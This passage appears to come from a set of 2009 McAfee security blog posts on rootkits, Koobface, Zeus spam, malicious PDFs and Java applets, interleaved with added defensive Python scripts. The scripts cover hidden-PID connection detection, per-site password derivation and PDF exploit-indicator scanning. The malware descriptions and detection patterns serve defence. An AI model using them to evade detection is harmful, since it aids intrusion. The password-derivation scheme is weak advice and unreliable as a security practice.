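  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.1.10:1043      203.0.113.7:6667       ESTABLISHED     1732
  TCP    192.168.1.10:1050      198.51.100.20:80       ESTABLISHED     2044
"""

_TCP_LINE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def visible_pids(tasklist_text):
    """Parse tasklist output into {pid: image name}, skipping the header."""
    pids = {}
    in_table = False
    for line in tasklist_text.splitlines():
        if line.startswith("====="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        # Image names may contain spaces, so split from the right:
        # name, pid, session name, session#, memory, "K".
        name, pid, _session, _num, _mem, _unit = line.rsplit(None, 5)
        pids[int(pid)] = name
    return pids


def tcp_connections(netstat_text):
    """Parse the TCP rows of netstat -ano into dicts carrying the owning PID."""
    rows = []
    for line in netstat_text.splitlines():
        m = _TCP_LINE.match(line)
        if m:
            local, remote, state, pid = m.groups()
            rows.append({"local": local, "remote": remote, "state": state, "pid": int(pid)})
    return rows


def orphaned_connections(tasklist_text, netstat_text):
    """Connections whose owning PID is absent from the visible process list.

    The socket table is kept separately from the EPROCESS list, so a process
    removed from that list by DKOM still shows up here by PID."""
    visible = visible_pids(tasklist_text)
    return [c for c in tcp_connections(netstat_text) if c["pid"] not in visible]


if __name__ == "__main__":
    for conn in orphaned_connections(TASKLIST_SNAPSHOT, NETSTAT_SNAPSHOT):
        print(f"PID {conn['pid']} owns {conn['local']} -> {conn['remote']} "
              f"({conn['state']}) but is not in the process list")
```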

Accessing kernel memory from userland is really bad, but it appears this hole has been plugged in later versions of Windows. Using this method of calling NtSystemDebugControl() to access kernel memory is not trivial, and we don’t expect this technique to be used widely. And this is a good thing because according to Artemis, Windows XP is still the most widely deployed operating system in corporate environments. My colleagues Igor Muttik and Dmitry Gryaznov, and Joel Yonts of Advanced Auto Parts demonstrated this during McAfee’s Focus 09 conference.

Nevertheless, I offer another reminder that the bad guys never hesitate to exploit any feature, whether documented or not, as long as they can gain control over innocent machines.

Log into privileged user accounts only when required, and keep your anti-virus software up to date!

Good News from China

As outlined in our recent report Mapping the Mal Web, the People’s Republic of China’s top-level domain (.cn) is currently one of the riskiest domain names to surf due to numerous malware downloads and other risky sites. However, this state of affairs may now change for the better:

On December 11 the China Internet Network Information Center (CNNIC), the state network information center of China, released an update regarding its auditing of domain name registrations. As of today, domain name applicants must submit a formal paper-based application when making an online application to the registrar. This includes the original application form with business seal, company business license, and a photocopy of the ID.

This change will make the .cn domain very unattractive for criminals and fraudsters who are looking for domains for which they can register anonymously, preferably paying with stolen credit card information. This would be a great step in making the domain name space of .cn a safer place. And if these measures are implemented as announced, it would in fact make China a leading example in the fight against fraudsters on the Internet.

I do hope that one small part of the announcement suffered just a bit in translation:

“3. From the day of the submission of online application, if CNNIC does not receive the formal paper-based application material within 5 days or the application material auditing is not qualified, the domain name to be applied will be deleted.”

I hope this means the application, not the domain, will be deleted after being in service for just five days. If not, this has the potential to become “Domain Tasting 2.0.”

‘Ho, Ho, Ho’: Santa Delivers FakeAV Presents

Following the latest Captcha techniques used by the W32/Koobface worm, it seems that malware authors have turned to Santa for help to deliver the nasty surprise which awaits Facebook users. The infection drops other Trojans, such as FakeAlert, and leaves the user in trouble.

It all begins with a post on a user’s Facebook wall. If the user clicks on the link, he or she sees a fake video player with a Christmas greeting, as shown below.

A fake message states that to view the video the user must download the latest version of Adobe Flash. If the user clicks “install,” the malware runs a variant of W32/Koobface on the user’s system.  Further, the user’s browser is redirected to more harmful sites harboring malicious files that automatically execute on the infected system.

Among the malicious files that are downloaded and executed are FakeAlert Trojans, which display a fake message stating that the system is infected with various viruses and that the user should buy a product to remove them.

I suggest you avoid installing anything that results from clicking video links related to any Christmas greetings.

Should Facebook’s New Privacy Features Concern You?

Facebook has changed the rules again. Should you be concerned?

On December 9 Facebook rolled out a new feature that was previously announced via an open letter from Facebook founder Mark Zuckerberg. This feature asked users to review their privacy settings to give them more control over who can view the content they publish on the popular social networking site. This change has upset some of Facebook’s users because they see this as an effort by Facebook to get users to make public more of the information that they post. Further, that information will be indexable by search engines such as Bing, which has announced that it will allow searches of status updates posted to Facebook and Twitter. This is a big change for most users, whose current settings may be restricted to family, friends, or groups they’ve joined.

Should users be worried? That depends on what type of information is being posted. Regardless of the privacy policies or the amount of data available to search engines or other users, the ultimate arbiter of what is posted and shared is each user. The service is called social networking for a reason.

Here’s the point: Although users do need to make sure they are aware of the privacy policies of the sites they enjoy and how that information might be used by others, ultimately the users themselves control what is posted online and what applications are installed in their profiles.

If you do not want to share information, do not post it. Once your data gets picked up by search engines, it’s virtually impossible to have it removed. It becomes part of your online brand forever.

Mapping the Mal Web: McAfee’s 3rd Annual Report

We have just released “Mapping the Mal Web,” our third report revealing the riskiest and safest web domains to surf and search.

For the first time combining data from McAfee’s SiteAdvisor and TrustedSource, the report is even more comprehensive than last year’s, naming Cameroon (.cm) as the riskiest place to surf with a whopping 36.7 percent of the domains posing a security risk.

For those domains for which we had 2,000 or more download tests, we measured the percentage of those tests that were risky. Romania (.ro, 21.0 percent), China (.cn, 18.6 percent), and the generic .info (15.2 percent) were found to be most risky, leading the fourth-place finisher, .biz (6.8 percent), by a wide margin.

This report also shows how much the registrars can achieve when they try. Last year Hong Kong (.hk) was the most risky domain to surf. After taking appropriate actions, their efforts paid off: With just 1.1 percent this year, they have dropped to 34th place. Congratulations to everyone involved!! ;)

That’s enough numbers for now. Get the full report here or find a summary over here.

The report is available in several other languages from the McAfee home page, and to help you avoid risky sites I strongly recommend our free SiteAdvisor.

H1N1 Vaccination Profile – A path to infection

On December 1st McAfee Labs detected an outbreak of a spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

H1N1 Vaccination Profile email claims to be from the CDC.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

  • Governmental registration program on the H1N1 vaccination
  • State Vaccination H1N1 Program
  • Your personal Vaccination Profile
  • Create your personal Vaccination Profile
  • State Vaccination Program
  • Creation of personal Vaccination Profile
  • Instructions on creation of your personal Vaccination Profile
  • Creation of your personal Vaccination Profile

These emails contain a URL that points to a website which urges the victim to download a vaccination profile archive:

This website wants to give you a virus.

The link is an executable that installs a VERY recent Zeus trojan variant. Zeus is an easy-to-use tool for constructing trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detects this strain (7/41 engines detected it according to VirusTotal, and McAfee had 2 of those 7 engines).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicates that most of them were registered with a Belgian registrar at active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar, “Xin Net Technologies”, but the DNS servers themselves are being hosted from locations in the US, Japan and Hong Kong. Some of the DNS servers in use have previously been associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate that some of the DNS servers themselves may simply be infected hosts.

These hostnames are associated with 135 distinct IP addresses for the websites hosting the Trojan, which stem from all over the world and appear to be DSL accounts.

The primary countries hosting the websites at the time of this writing are in Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

Get Rich Quick! Just In Time for the Holidays

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that cyber criminals can take advantage of. Fears of not being able to pay the monthly mortgage, car payments, backed-up bills, and providing for your children for the holidays have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as they try to make ends meet. Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up their sensitive information. In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas“) including get rich quick schemes and work from home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple of such scams arriving via email which link off to Twitter updates or free blogging services like Google’s Blogspot:

Get Rich!

More Getting Rich!!!

Get Rich Tweet!!

As the holiday season progresses, we will see more of these types of scams popping up with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card! One bit of advice that we ask users to follow is that if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing their web site into your browser. Do not click on a link in an email or instant message to get you there because the link might actually be masked to go to a lookalike site set up by cyber criminals to steal your personal information. If the offer that arrived in your inbox is legitimate it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

Boosting Security Awareness in Colleges

Security breaches, laptop theft, and identity theft happen all the time, and these crimes increase every year. The need for people to become more aware of their digital presence and the threats surrounding it is vital.

The pace at which these threats increase is much faster than our awareness grows, which makes for a bad situation. One way to improve matters is to implement security-awareness programs in colleges and universities.

Why choose colleges? Higher education institutions are an ideal platform for spreading security awareness because they produce so much of our future workforce. With computers everywhere in businesses, it’s essential that these graduates learn about the invisible threats that face them and their employers’ information.

Another benefit of focusing on colleges and universities is that this environment provides both a very good learning atmosphere and people working in many fields. Thus a security-awareness program will benefit not only students in the computer or business fields, but also in medical, environmental, media, and many more disciplines.

Hot Topic: Identity Theft
College students are attractive targets for identity thieves because they generally have clean credit records, allowing thieves to easily take out loans in their names. Many students may also not realize the potential for fraud and do not guard their personal information as closely as they should. Students’ social security numbers, email IDs, and addresses may be listed on everything from identification cards to report cards, which makes this information readily available to enterprising thieves. Universities and colleges have also come under attack from hackers in recent years, due to the value of the information they store.

What are some aspects of identity theft? Here are some figures from a 2009 study by Javelin Strategy & Research Center:

  • Identity theft is on the rise, affecting almost 10 million victims in 2008. That’s a 22 percent increase from 2007.
  • Victims are spending less money to correct the damage from identity theft. The mean cost per victim is $500, and most victims pay nothing due to zero-liability fraud-protection programs offered by their financial institutions.
  • 71 percent of fraud happens within one week of the theft of a victim’s personal data.
  • Low-tech methods for stealing personal information are still the most popular for identity thieves. Stolen wallets and physical documents accounted for 43 percent of all identity theft, while online methods accounted for only 11 percent.

Types of Identity Theft
Identity theft can happen to anyone, and it can come in all shapes and sizes. For example, your credit card number could be stolen and used to make online purchases, a thief could impersonate you to open up a loan in your name, a felon could commit a crime and pretend to be you when caught, or someone could use your personal information to apply for a job.

Here’s a chart describing kinds of identity theft, based on Federal Trade Commission complaint data:

Stats

Students should protect themselves by detecting and resolving identity thefts. Here are some general tips to minimize the risk of identity theft:

  • Check credit card statements regularly. Students should examine their financial statements at least once per month for any unusual activity. A credit-monitoring service can be a valuable tool in fighting identity theft, as it would alert them if any new accounts are opened in their names.
  • Use strong passwords. If remembering many passwords is too difficult, create a few strong ones that include numbers, capital letters, and special characters such as ^ or *. Most important, do not share your passwords, debit or credit card PINs, or leave lying about any papers or unlocked computers with personal information.
  • Protect your computer. It is a good practice to enable all security features and keep your anti-virus and spyware protection up to date. Use a password-enabled lock (such as a screen saver) on your computer in case you leave it running while you are not present.
  • Don’t swallow the bait. College students, though technically savvy, can fall victim to scams. Beware of phishing attempts that ask you to update personal data such as social security numbers and bank account information. The senders are trying to steal your data to commit fraud. Students should also watch out for fake anti-virus tools that claim your computer is infected and insist you run a “scan” to find malware. Use McAfee SiteAdvisor to check if you are surfing safely.


Koobface Worm Asks for Captcha

We discussed in a recent blog how Google Reader has become an unwitting spam target. We now see the same behavior in a recent variant of Koobface. This variant uses the Google Reader page to host the malware. Once the user selects the Google link, a fake YouTube window appears, as shown below.

YouTube

When the user tries to play the YouTube video, the webpage gets redirected to:

hxxp://www.hs-limmattal.ch/{blocked}/

which pretends to be a Facebook help center page that, in an ironic twist, displays information on how to protect against the Koobface worm!

Facebook Page

The user is then asked to download a setup file that purports to be a free anti-virus scanner. The file size is said to be 32.39MB, whereas the one actually downloaded is only 40.5KB in size. The download doesn’t stop here. The malware keeps on downloading many components that support it. It also checks for the latest copy of itself and downloads as needed.

This variant of Koobface also tracks the cookies on the user’s machine and tries to send them to a remote server.

One more trick: the malware tries to break Captchas and then uses them to register another Facebook account. The infected machine shows a Captcha window and tries to deceive the user by displaying a shutdown countdown. Koobface, however, does not shut down the user’s machine when the countdown timer finishes. Instead the machine stays locked until the Captcha is entered successfully.

Captcha

After the user enters the Captcha correctly, a JPEG image of the Captcha is sent to the remote server (as shown in the image below):

jpeg image

The malware keeps asking for a response from the remote server; once it receives the response, a new account gets created. The account can be used for spamming or for any other activity as desired by the attacker. The same tactic is used for infecting Twitter, MySpace, and hi5 (all popular websites):

jpeg 2

This new method of account creation is cheap, and there are dedicated Captcha administrators who will do this work for just a few cents.

This worm steals email credentials, FTP credentials, and IM application credentials. The encrypted stolen data is sent to the Trojan’s command and control server. The worm has also redirected user searches.

To unlock the machine, users can follow this process:

  • Press Ctrl+Alt+Del
  • Go to Task Manager
  • Then select Processes
  • In Processes, search for RUNDLL32.exe
  • End that process
  • Search for processes with names rdr_xxxxxxxx. End these processes as well.

These steps will kill the malware processes that are running on the user’s machine and will unlock the machine.

McAfee Labs reminds users not to click on YouTube links from unknown sources and to not accept any requests from unknown users!

Highlights of Xcon 2009

This is my fourth time to attend Xcon (the Xfocus Information Security Conference), and the third time as a speaker. Xcon is the biggest and most influential nongovernmental computer security technical conference in China. Actually for most Chinese security researchers it’s not only a technical event, but also a big party where they can meet old friends, make new friends, and communicate their ideas among a group of security technical geeks.

Xcon 2008 was postponed to November due to the Olympic Games in Beijing; thus the turnout was smaller than usual. Xcon 2009, on August 18-19, was held as expected; but as a consequence of the global economic crisis, I was not able to see many acquaintances, especially some of my foreign friends. Luckily I still met Tomas Lim, Vangelis, and Kana again. They are all well-known organizers of other security conferences, at which I have had the honor to be invited to speak.

This year, there were ten talks in total, which covered almost all the hot topics of computer security (listed below) though there was only one track. The world-famous security researcher Kris Kaspersky was supposed to speak on Linux Rootkits topics, but he didn’t make it due to visa issues. My presentation was the last on the first day, and the presentation was “Go Deep Into The Security of Firmware Update,” which primarily focused on security concerns on firmware updates of various PC components, including system BIOS, embedded controllers in notebooks, Intel AMT, etc. Basically the talk went well, although the demo section had problems because the big LCD projector couldn’t display the BIOS Power-On Self-Update process that was shown on my screen. It worked once the OS kernel and appropriate drivers were loaded, which I didn’t think about beforehand. Interestingly, someone told me this can probably be resolved by pressing a hot key during the BIOS boot phase.

Presentation Topic Statistics:
Vulnerability/Exploit: 4
Web-Based Security: 2
Firmware/Hardware: 2
Cryptography: 1
Virtualization: 1

There were many honourable mentions in this year’s Xcon, but one of my favorites was the Hardware and Virtualization topic. The presenter, Nguyen Anh Quynh (a Vietnamese researcher who works for AIST Japan), presented for the second time at Xcon, this time talking about VM security in “Detecting Rootkits Inside Virtual Machines.” He ran a new rootkits detector tool called eKimono inside a VM (Xen’s Dom0) and scanned the memory of the guest VM for suspicious things.

This talk brought another recent VM session to mind, a Syscan talk “SADE: Injecting Agents into VM Guest OS,” by Matt Conover. It looks like VM technology as a defensive means is becoming more common than talking about how to exploit VM technology. (One such topic was the super-hot “Virtualized Rootkits” session in the last two years.) Antiy Lab’s talk “Rediscovery on the Attack of Equipment and Signal” was also popular; the presenters did a live show on how to remotely intercept and decrypt the keystroke signals emitted by a wireless keyboard device. I can still remember their Xcon 2008 presentation about physical attacks. They demonstrated how to execute arbitrary code by inserting a USB device into a victim’s machine with AutoPlay functionality disabled. While the theory behind it was not disclosed, they declared this is definitely not achieved by physical memory modification through a device’s bus mastering DMA operation. As far as I know, unlike Firewire (1394), which is an Expansion Bus Architecture, USB doesn’t have such a capability.

I missed some web-based security talks since I’m not so keen on scripts. (I’m a binary guy :) ) But I listened carefully to FunnyWei’s “Abnormity Usability Analysis” and Wang Tielei’s “Integer Overflow Vulnerability Auto-Mining,” especially the one by Dr. Wei, who developed a prototype tool that helps track controllable data and execution flow, which aids in analyzing whether an abnormal condition is usable.

One thing I noticed this year was that most topics focused on vulnerability mining or analysis, but there was no talk directly dealing with exploiting vulnerabilities, such as the most popular and expected topic, “Memory Protection Bypassing on Windows 7.” I remember that Alexander Sotirov gave such a speech targeting Windows Vista at last year’s event, and I hope there will be some breakthrough in this field in the coming year.

Looking forward to seeing you at xKungFoo 2009 in Beijing.

Make Your Password Secure

No matter how sophisticated security gets, we still need to handle the basics properly. One of the most basic tasks is to create and use secure passwords. You need them to log onto your computer, reach internal applications, and enter just about every website you visit. They are pervasive in our connected world.

But how many of us give any real thought to how secure our passwords are? Because we use them so often, we’re tempted to reuse the same one over and over again. However, as your mother might say, that’s a poor decision. Here are pros and cons of several common password techniques, and a simple-to-remember method that is both easy for you and hard for hackers.

Frequency and complexity
Our decisions about passwords are often some balance of frequency and complexity. The more frequently we use a password, the easier it is to remember; and the more complex the password is, the less likely we are to remember it. This difficulty leads many people to use the same password for all their online accounts. Banking, auction, and social networking sites could have the same password for the same account name. In such a situation, a hacker who compromises a single website gets the username and password for all of your accounts. It is important for people to remember that their website passwords are owned by that website, not by the individuals who entered them. Thus giving a website a password that accesses other accounts is not the best way to maintain security.

Users should avoid any password that can be cracked by a dictionary attack. If your password can be found in an unabridged dictionary, then it can be “guessed” by having a computer program try every entry. “123456” is not adequate to avoid a dictionary attack because it is the most commonly used password in existence. Using profanity may make talking about the password unacceptable in polite conversation, but that social boundary will not stop someone willing to break the law to steal your identity.

Password habits
Most people’s password habits fall into one of three categories:

  • The global password. Many people use the same password everywhere. This is the worst password method; it means that someone who hacks a website that you bought something from years ago can now get into all your most frequently used accounts.
  • The short list of passwords. Others create a hierarchical list of passwords that they reuse. This allows them to use their most complex password for financial websites, a simpler password for websites where items are purchased, and another password for social networking websites. This is exponentially better than the single global password, but exponentially better than “worst” is still not good.
  • The black book of passwords. Some people choose a unique password for every website they visit, but because of the huge list of passwords they need to remember, they all are written on a pad of paper kept near the computer. This is not only unwieldy and inflexible (what if you go on vacation and forget it?), but you can lose the list or have it stolen by someone who gains brief access to your office or computer. Many corporate environments that force people to constantly change their passwords are littered with passwords on sticky notes or on paper in a drawer that is accessible by coworkers, cleaners, or burglars.

Creating your password algorithm
In creating passwords we want to maximize complexity and eliminate repeated passwords without adding any additional stress to our brains. To do this we need an internal algorithm that will generate a unique, difficult-to-guess password for every website we visit. The algorithm needs to be repeatable, so that remembering the passwords is not important: All we need to remember is the algorithm that generates the password. Thus we need to take something about ourselves, add something unique about the website in question, and modify that information so that the algorithm is not obvious to anyone looking at the password.

Here is an example of a password for mcafee.com.

My token: light
The website: mcafee.com
The password: 123l1ghTjdqr33^!

In spite of the password’s complexity, the algorithm here is relatively simple. We start with “123,” and then add the word “light” with the “i” replaced with the number 1 and a capital “T” at the end. We add “jdqr33,” the letters (and numbers) above the word “mcafee” on my keyboard. We finish off with a bang—“^!”—to make sure we include some special characters.

Here’s another password with the same token and website:

The password: LlIiFCM999gh+

That’s the “li” in “light,” but with an upper and lowercase of each, then capitalized consonants from “mcafee” written backward, a few 9’s, and a “ght” with the “t” replaced by a plus sign.

Your algorithm can be anything you want, but you should choose one that includes numbers, letters (both capital and lowercase), and special characters. Some password validation algorithms don’t accept special characters, and others require you to start with a letter. These can be your second and third tries if you don’t get it on the first. Having a good password algorithm prevents someone from getting one password and using it on all your accounts; it also makes your password hard to guess, and it doesn’t require you to carry around a list of passwords.

In the case where your office administrator forces you to change your password frequently, you need only to write down the website token instead of the full password. So even if people find your little black book of passwords, they’ll be lost without the algorithm.
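The first algorithm above (the “123” prefix, the token with its “i” turned into a 1 and its last letter capitalized, the keys one row above the site name, and a “^!” suffix), as an added worked example that is not the post’s own code. It assumes a US QWERTY layout for the “key above” step and adds the two fallbacks the post mentions (no special characters; must start with a letter) as options; `meets_policy` is an assumed composition check, not anything the post specifies.

```python
# Added example: a per-site password algorithm in the style of the post.
# Assumes a US QWERTY layout; the "key above" step maps a key to the key
# directly above it in the same column (m -> j, a -> q, e -> 3).
KEYBOARD_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]


def key_above(ch: str) -> str:
    """Return the key one row above `ch`; digits and unknown keys pass through."""
    for row in range(1, len(KEYBOARD_ROWS)):
        idx = KEYBOARD_ROWS[row].find(ch)
        if idx != -1 and idx < len(KEYBOARD_ROWS[row - 1]):
            return KEYBOARD_ROWS[row - 1][idx]
    return ch


def site_token(site: str) -> str:
    """'mcafee.com' -> the keys above 'mcafee' -> 'jdqr33'."""
    name = site.lower().split(".")[0]
    return "".join(key_above(c) for c in name)


def derive_password(token: str, site: str, allow_special: bool = True,
                    letter_first: bool = False) -> str:
    """Combine the personal token and the site-derived part as the post describes.

    allow_special=False is the fallback for sites that reject special characters;
    letter_first=True moves the '123' prefix to the end for sites that require
    the password to start with a letter (both are assumed variants).
    """
    word = token.replace("i", "1")            # "light" -> "l1ght"
    word = word[:-1] + word[-1].upper()       # capitalize the last letter -> "l1ghT"
    parts = [word, site_token(site), "123"] if letter_first else ["123", word, site_token(site)]
    password = "".join(parts)
    if allow_special:
        password += "^!"
    return password


def meets_policy(password: str, min_len: int = 12) -> bool:
    """Assumed composition policy: length plus digit, upper, lower and symbol classes."""
    return (len(password) >= min_len
            and any(c.isdigit() for c in password)
            and any(c.isupper() for c in password)
            and any(c.islower() for c in password)
            and any(not c.isalnum() for c in password))


if __name__ == "__main__":
    for site in ("mcafee.com", "ebay.com"):
        pw = derive_password("light", site)
        print(f"{site:12} {pw:20} policy ok: {meets_policy(pw)}")
```

Two things worth noticing when running it: the site-derived part is a fixed transform of a public value, so the secret in this scheme is the token and the shape of the algorithm, and two passwords from the same scheme share the same visible structure. The second algorithm in the post (“LlIiFCM999gh+”) is a different scheme and is not implemented here.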

COFEE Break Turns Messy

A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Because some active system processes and network data are volatile and may be lost after the computer is turned off, investigators have been in search of a tool that could assist them in the very limited time they may have to investigate a crime. It is for this reason that in October, Microsoft and the National White Collar Crime Center (NW3C) announced an agreement establishing NW3C as the first U.S.-based distributor of the Computer Online Forensic Evidence Extractor (COFEE).

Recently the software appears to have leaked onto the Internet. On Tuesday, November 10, someone using the pseudonym DrWeird of Eti.in posted the documentation and a working build of Version 1.1.2 online.

Here are some details I collected from one of the posted manuals.

Working on Windows XP, COFEE consists of three major components: the GUI for the investigator, the command‐line application to be executed on the target machine, and the individual tools that are managed by COFEE and the command‐line application. As explained in the manual, the execution process is divided into three phases: tool generation, data acquisition, and report generation.

During the tool generation phase, digital forensics specialists can select tools to run against a target machine based on the individual case requirements. They can do this by either selecting a predefined profile, or by manually creating a profile and selecting which tools (including switches) to run against the target machine.

Two predefined profiles were developed to help investigators during the generation phase. The first is the Volatile Data Profile, which carries out a full forensic examination. None of the programs makes any direct writes to the suspect’s file system. The second, the Incident Response Profile, can be used when an investigator cannot perform a forensic analysis on the target machine. This profile is designed to have minimal impact on the suspect’s file system.

After “brewing” a cup of COFEE, investigators insert the USB device into the target machine. The data acquisition phase runs and all collected data will be stored on the USB stick.

After data collection, investigators can start the report generation phase by loading that information into the GUI console on the investigator’s machine and generate a report.

In the past, I pointed out that if law enforcement created dedicated tools, one of these days they would certainly fall into crooked hands. These hands will be happy to study and reuse them for their own purposes. The detection policies for the original piece of code, as well as its existing and potential future variants, are still much debated. Today the disclosed program is not so sensitive; it is merely a repackaging of known utility tools many have been using for a long time. But this leak must remind us that people will use the same tools for very different reasons and goals.

Curiosity as a Malicious PDF

What would you do if you saw an email in your inbox with a PDF named “U.S. ship thwarts second pirate attack November 18, 2009.pdf”? Would the title pique your curiosity? I hope not enough for you to open the document!

This PDF is the latest in the ugly line of exploit- and malware-ridden embedded PDFs that damage your computer. If you were unfortunate enough to open the file, you’d see what the malware writers expect you to see: a file named “Adobe.pdf” with details on a real story about piracy off the coast of East Africa.

Bogus PDF screenshot

But behind the scenes, sinister things occur. The malicious PDF runs some JavaScript that exploits the Adobe Collab overflow (CVE-2007-5659) and Adobe getIcon (CVE-2009-0927) vulnerabilities. This screenshot shows the beginning of the compressed JavaScript stream:

Malicious JavaScript stream

In addition, two variants of ProcKill-EM are dropped into the Windows system folder, usually C:\Windows\system32.
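A PDF that carries its script in a compressed stream, as the screenshot above shows, cannot be triaged with a plain string search. As an added example (not code from the post), the Python below inflates every FlateDecode stream in a PDF and reports the indicators the post names (a JavaScript action and references to the Collab and getIcon APIs). The two PDFs it scans are constructed inline as test data; the indicator list and the `_build_pdf` helper are assumptions for the example, not a McAfee signature.

```python
import re
import zlib

# Indicators taken from the post: a JavaScript action plus the two abused APIs.
INDICATORS = (b"/JavaScript", b"/JS", b"Collab", b"getIcon")

# One stream object: its dictionary (never crossing an endobj) and the raw body.
STREAM_RE = re.compile(
    rb"obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n(.*?)\r?\nendstream",
    re.DOTALL,
)


def extract_streams(pdf: bytes):
    """Yield (dictionary, body) per stream object, inflating FlateDecode bodies."""
    for match in STREAM_RE.finditer(pdf):
        dictionary, body = match.group(1), match.group(2)
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass  # damaged or non-standard stream: keep raw bytes for manual review
        yield dictionary, body


def find_indicators(pdf: bytes) -> set:
    """Indicator strings seen in the raw file or inside inflated streams."""
    found = {ind.decode() for ind in INDICATORS if ind in pdf}
    for dictionary, body in extract_streams(pdf):
        found |= {ind.decode() for ind in INDICATORS if ind in dictionary or ind in body}
    return found


def _build_pdf(catalog_extra: bytes, stream_body: bytes) -> bytes:
    """Minimal PDF with one FlateDecode stream (constructed test data, not a real sample)."""
    packed = zlib.compress(stream_body)
    return (
        b"%PDF-1.4\n"
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R " + catalog_extra + b" >>\nendobj\n"
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n"
        b"4 0 obj\n<< /Length " + str(len(packed)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + packed + b"\nendstream\nendobj\n"
        b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
    )


# Constructed samples: one whose compressed stream references the abused APIs, one benign.
SUSPICIOUS_PDF = _build_pdf(
    b"/OpenAction << /S /JavaScript /JS 4 0 R >>",
    b"var buf = 'constructed'; Collab.getIcon(buf);",
)
CLEAN_PDF = _build_pdf(b"", b"BT /F1 12 Tf (hello) Tj ET")

if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS_PDF), ("clean", CLEAN_PDF)):
        print(name, sorted(find_indicators(blob)))
```

The test data makes the point of the example visible: the API names appear only inside the compressed stream, so a raw scan of the file sees just the `/JavaScript` action, while the inflated stream reveals the rest.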

As always, if you receive a document–PDF or otherwise–from someone you don’t know, don’t open  it. And even if you know the document’s sender, scan the file with your anti-virus program with the latest signatures before you open it.

McAfee customers are protected in the 5809 DATs against the threats mentioned above, as Exploit-PDF.aa and ProcKill-EM. Keep your signatures up to date and stay secure!

Malicious Java Applet Poses as Carrie Prejean Video

McAfee Labs has observed various spam runs exploiting the recent sensational Carrie Prejean news. The Prejean video is rapidly becoming one of the most searched-for topics ever on the net since the existence of the tape became common knowledge.

Source: Google Trends

Java applets provide everything from interactive features to web applications to advertisements. Since the birth of Java, attackers have exploited its security platform. Attackers are now taking advantage of a feature of Java to social-engineer less tech-savvy Internet users into infecting themselves with malware.

Here’s how an attack works:

  • The bad guys spam a link claiming to be the Carrie Prejean video
  • Then they trick victims into visiting a malicious website, which prompts users to run a Java applet to view the video
  • At this point, the applet runs in the browser, which in turn downloads a malicious executable that launches itself on the victim’s machine

The signed applet contains a signature that browsers should verify through a remote, independent certificate-authority server. Once the signature is verified and the user also approves, the signed applet gains more rights, becoming equivalent to an ordinary application. When the applet is injected into a trusted website, users would hardly take the trouble to check whether the certificate is legitimate.

This approach is very effective for the following reasons:

  • It’s easier to social-engineer users, as many rich multimedia applications use Java
  • Unlike spammed links that contain a cocktail of exploits or a zero-day attack, this approach exploits the applet’s design
  • The attack is independent of browser type and version
  • The attack works on a machine with the latest version of Java, which makes the exploit all the more dangerous

The malicious applet has almost no detection on VirusTotal, but McAfee detects it with the current DATs as Exploit-ByteVerify.b. The malicious executable incorporates SMTP functionality capable of sending spam and is currently detected as BackDoor-EHP.

We urge users to handle unknown Java applets with caution and make sure any digital signature comes from a trusted authority before executing it.

The McColo Effect: One Year Later

One year ago today, email administrators were astonished to notice that the amount of spam hitting their mail servers had plunged precipitously. Email volumes dropped off as much as 60 percent to 70 percent, and the reason wasn’t immediately obvious to anyone except the folks who knew that McColo, a major spam-hosting ISP, had been taken offline. Three of the largest spam-sending botnets at the time–Rustock, Srizbi, and Mega-D–had command and control machines hosted at McColo and were drastically affected. Mega-D’s volume dropped by more than 95 percent and Srizbi’s volume dropped by more than 80 percent.

Srizbi DropOff

Mega-D DropOff

However, only days after McColo was taken offline, it was reconnected for a brief period–about 12 hours–by its uplink provider, giving just enough time for the Rustock botnet owners to recommunicate with their infected machines and point the command and control centers to other service providers. Rustock quickly regained its status as a top spam distributor. The Mega-D botnet owners also bounced back until it was shut down just this past week. Srizbi, which once accounted for more than 50 percent of spam volume, never recovered and is no longer a factor in today’s spam wars.

What has happened since McColo was shut down? Did spam volumes ever recover from the loss of three of the largest spam-sending botnets? Not only did spam volumes recover, unfortunately, but they recovered quickly and have greatly surpassed the volumes that we saw before McColo was taken offline.

ib Volume

You can see in the preceding graph where volumes stood and how they dropped off after McColo was cut off. However, the shutdown’s effect was brief and ultimately small. We have seen dramatic increases since then due to the relaunching of botnets such as Rustock as well as new botnets such as Bredo (which primarily sends fake nondelivery notifications spoofing package delivery services like FedEx, DHL, and UPS) and Waledac (the rebirth of the Storm botnet). Spam volumes have more than doubled since just February 2009, dwarfing several times over the decreases due to McColo’s demise.

